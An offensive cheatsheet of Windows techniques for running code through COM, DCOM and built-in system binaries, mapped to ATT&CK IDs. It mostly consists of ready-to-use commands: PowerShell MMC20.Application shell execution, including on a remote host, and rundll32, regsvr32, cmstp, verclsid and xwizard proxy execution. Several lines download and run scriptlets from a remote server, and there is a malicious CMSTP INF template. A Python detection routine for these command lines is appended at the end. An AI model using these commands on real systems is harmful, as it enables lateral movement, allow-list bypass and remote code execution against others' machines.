📜 COM Execution - T1559.001

Templates and methods for quickly executing code through COM and DCOM

Windows Component Object Model quick execution cheatsheet

PowerShell

Using PowerShell with .NET notation to quickly create a COM or DCOM instance from either a CLSID or a ProgID

Execution via CLSID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Execution via ProgID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

DCOM Execution

Distributed COM (DCOM) is an extension of COM which, among other things, allows a COM object to be activated and invoked on a remote host. Note that DCOM can also be used locally by specifying the loopback address (127.0.0.1) as the server.

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Rundll32

Execution via CLSID

Rundll32.exe -sta {GUID}

Execution via ProgID

Rundll32.exe -sta Scripting.Dictionary

Execution via shell32.dll

# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}

Scriptlet Execution from Remote Server

# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://127.0.0.1:8080/calc.sct").Exec();

Remote Scriptlet via INF file

# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1

Regsvr32

COM Local Scriptlet Execution

# Running a scriptlet locally, without touching the registry
regsvr32 /s /n /u /i:malware.sct

COM Scriptlet Execution from Remote Server

# COM scriptlet via Regsvr32 from a remote location, without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll

CMSTP

Execution via INF file that downloads and executes a scriptlet (sct)

# INF file (test.inf)
# Running a scriptlet via a CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"

# Install the INF with CMSTP
cmstp.exe /su test.inf

Credit to @Amr_Thabet for the INF code

PyCOM

🛠️

Verclsid

Execution via CLSID

verclsid.exe /S /C {CLSID}

Xwizard

Execution via CLSID

xwizard.exe RunWizard /taero /u {CLSID}

ATT&CK Techniques in this Page

  • Command and Scripting Interpreter: PowerShell - T1059.001

  • Inter-Process Communication: Component Object Model - T1559.001

  • System Binary Proxy Execution: CMSTP - T1218.003

  • System Binary Proxy Execution: Rundll32 - T1218.011

  • System Binary Proxy Execution: Verclsid - T1218.012

  • System Binary Proxy Execution: Regsvr32 - T1218.010
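As an added example (not part of the original cheatsheet), a small Python triage routine that maps process-creation command lines to the ATT&CK technique IDs listed above; the sample log lines are constructed from this page's own commands plus one benign regsvr32 call, and the regex patterns, the host 10.0.0.2 and the event field names are assumptions.

```python
import re

# Constructed sample process-creation command lines (as recorded by Sysmon Event ID 1
# or Security 4688), modelled on the commands on this page plus one benign regsvr32 call.
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "cmd": "powershell -c \"$a=[Activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application.1','10.0.0.2'))\""},
    {"image": "rundll32.exe", "cmd": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";GetObject(\"script:http://127.0.0.1:8080/calc.sct\").Exec();"},
    {"image": "regsvr32.exe", "cmd": "regsvr32 /s /n /u /i:http://server/file.sct C:\\Windows\\system32\\scrobj.dll"},
    {"image": "cmstp.exe", "cmd": "cmstp.exe /su test.inf"},
    {"image": "verclsid.exe", "cmd": "verclsid.exe /S /C {49B2791A-B1AE-4C90-9B8E-E860BA07F889}"},
    {"image": "xwizard.exe", "cmd": "xwizard.exe RunWizard /taero /u {49B2791A-B1AE-4C90-9B8E-E860BA07F889}"},
    {"image": "regsvr32.exe", "cmd": "regsvr32 /s C:\\Program Files\\Vendor\\control.ocx"},  # benign
]

GUID = r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}"
# Second argument of GetTypeFromCLSID/ProgID is the DCOM server (remote activation).
DCOM_REMOTE = re.compile(r"GetTypeFrom(?:CLSID|ProgID)\(\s*['\"][^'\"]*['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)

# Each rule: (ATT&CK id as listed on this page, what it flags, pattern over the command line).
RULES = [
    ("T1218.011", "rundll32 COM/scriptlet proxy execution",
     re.compile(r"rundll32(\.exe)?\s.*?(javascript:|\s-sta\s|SHCreateLocalServerRunDll|LaunchINFSection)", re.I)),
    ("T1218.010", "regsvr32 scriptlet via /i: (remote or .sct) or scrobj.dll",
     re.compile(r"regsvr32(\.exe)?\s.*?(/i:\S*(https?://|\.sct)|scrobj\.dll)", re.I)),
    ("T1218.003", "cmstp installing an INF with /s or /su",
     re.compile(r"cmstp(\.exe)?\s.*?/su?\s.*?\.inf\b", re.I)),
    ("T1218.012", "verclsid invoked with an explicit CLSID",
     re.compile(r"verclsid(\.exe)?\s.*?/c\s*" + GUID, re.I)),
    ("T1559.001", "xwizard RunWizard /u {CLSID}",
     re.compile(r"xwizard(\.exe)?\s.*?RunWizard.*?/u\s*" + GUID, re.I)),
    ("T1559.001", "PowerShell Activator::CreateInstance on a CLSID/ProgID",
     re.compile(r"\[(System\.)?Activator\]::CreateInstance\(.*?GetTypeFrom(CLSID|ProgID)\(", re.I)),
]

def match_rules(cmd):
    """Return the de-duplicated ATT&CK ids of every rule whose pattern matches the command line."""
    return list(dict.fromkeys(tid for tid, _desc, pat in RULES if pat.search(cmd)))

def dcom_remote_host(cmd):
    """Return the DCOM server passed to GetTypeFromCLSID/ProgID, or None for local activation."""
    m = DCOM_REMOTE.search(cmd)
    return m.group(1) if m else None

def triage(events):
    """Keep only events that hit at least one rule, annotated with technique ids and DCOM target."""
    out = []
    for ev in events:
        ids = match_rules(ev["cmd"])
        if ids:
            out.append({"image": ev["image"], "techniques": ids, "dcom_host": dcom_remote_host(ev["cmd"]), "cmd": ev["cmd"]})
    return out
```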
